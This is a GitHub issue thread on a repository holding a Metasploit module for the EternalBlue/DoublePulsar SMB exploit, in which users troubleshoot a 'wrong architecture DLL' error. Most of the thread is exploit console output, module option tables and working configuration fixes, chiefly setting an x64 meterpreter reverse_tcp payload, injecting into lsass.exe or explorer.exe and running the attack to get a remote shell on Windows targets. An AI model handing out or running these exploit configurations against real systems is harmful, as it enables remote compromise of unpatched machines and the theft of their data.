Telefonica / Eternalblue-Doublepulsar-Metasploit

Module of Metasploit to exploit the vulnerability Eternalblue-Doublepulsar.
GNU Lesser General Public License v2.1

need help sending wrong DLL #18

Open dharni-poker opened 7 years ago

dharni-poker commented 7 years ago

error: sending wrong targetarchitecture DLL to target

Ahmedabdsalam commented 7 years ago

dharni-poker, you should check whether the arch is x86 or x64. If x64, set payload as windows/x64/meterpreter... and check TARGETARCHITECTURE... and PROCESSINJECT lsass.exe for 64.

anwareset commented 7 years ago

x64 --> set PROCESSINJECT lsass.exe and set TARGETARCHITECTURE x64 and set PAYLOAD windows/x64/meterpreter/reverse_tcp or bind_tcp or something else.

azzarin commented 7 years ago

Hey, I have the same problem. Trying to exploit a Windows Server 2008 x64. I have set PROCESSINJECT to lsass.exe and TARGETARCHITECTURE x64. Also set TARGET to Windows Server 2008.

Also windows/x64/meterpreter/reverse_tcp

[*] Started reverse TCP handler on 10.10.1.45:4444
[*] 10.10.1.42:445 - Generating Eternalblue XML data
[*] 10.10.1.42:445 - Generating Doublepulsar XML data
[*] 10.10.1.42:445 - Generating payload DLL for Doublepulsar
[*] 10.10.1.42:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
[*] 10.10.1.42:445 - Launching Eternalblue...
[+] 10.10.1.42:445 - Backdoor is already installed
[*] 10.10.1.42:445 - Launching Doublepulsar...
Error sending wrong architecture DLL to target
[+] 10.10.1.42:445 - Remote code executed... 3... 2... 1...
[*] Exploit completed, but no session was created.

msf exploit(eternalblue_doublepulsar) > show options

Module options (exploit/windows/smb/eternalblue_doublepulsar):

Name                Current Setting                                  Required  Description
----                ---------------                                  --------  -----------
DOUBLEPULSARPATH    /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Doublepulsar
ETERNALBLUEPATH     /root/Eternalblue-Doublepulsar-Metasploit/deps/  yes       Path directory of Eternalblue
PROCESSINJECT       lsass.exe                                        yes       Name of process to inject into (Change to lsass.exe for x64)
RHOST               10.10.1.42                                       yes       The target address
RPORT               445                                              yes       The SMB service port (TCP)
TARGETARCHITECTURE  x64                                              yes       Target Architecture (Accepted: x86, x64)
WINEPATH            /root/.wine/drive_c/                             yes       WINE drive_c path

Payload options (windows/meterpreter/reverse_tcp):

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
LHOST     10.10.1.45       yes       The listen address
LPORT     4444             yes       The listen port

Exploit target:

Id  Name
--  ----
7   Windows Server 2008 R2 (x86) (x64)

dharni-poker commented 7 years ago

Sorry man, I have not solved this problem yet.

azzarin commented 7 years ago

I'm not sure, but I do not have the issue anymore. I'm not sure what fixed it. I did copy all the files from the "debs" folder into .wine/drive_c.

ppdmartell commented 6 years ago

@azzarin I came here because of the same cause, but I guess you are using the wrong payload (x86 instead of x64). You should use set payload windows/x64/meterpreter/reverse_tcp. However, I'm using all your config even with the x64 payload and got the same result. I hope this works for you.

azzarin commented 6 years ago

@pedropabloDM I have solved my problem. Can't even remember the fix, but it works. Thanks.

ppdmartell commented 6 years ago

@azzarin That's great, although it's a shame you don't remember the fix, I'm currently stuck in there.

ghost commented 6 years ago

I use this technique:

set payload windows/x64/meterpreter/reverse_tcp
set processinject explorer.exe
set targetarchitecture x64
run

kareemalhourani commented 5 years ago

@meijitm123 Thanks man it works for me :)

umesh-verma commented 5 years ago

The problem is not in the exploit; it's the payload that is generating the error. Set the meterpreter payload to x64.

lexsaints commented 5 years ago

> @azzarin I came here because of the same cause, but I guess you are using the wrong payload (x86 instead of x64). You should use set payload windows/x64/meterpreter/reverse_tcp. However, I'm using all your config even with the x64 payload and got the same result. I hope this works for you.

Works for me, thanks.

RootkitVega commented 4 years ago

> I use this technique:
>
> set payload windows/x64/meterpreter/reverse_tcp
> set processinject explorer.exe
> set targetarchitecture x64
> run

These commands fix my error! Thanks.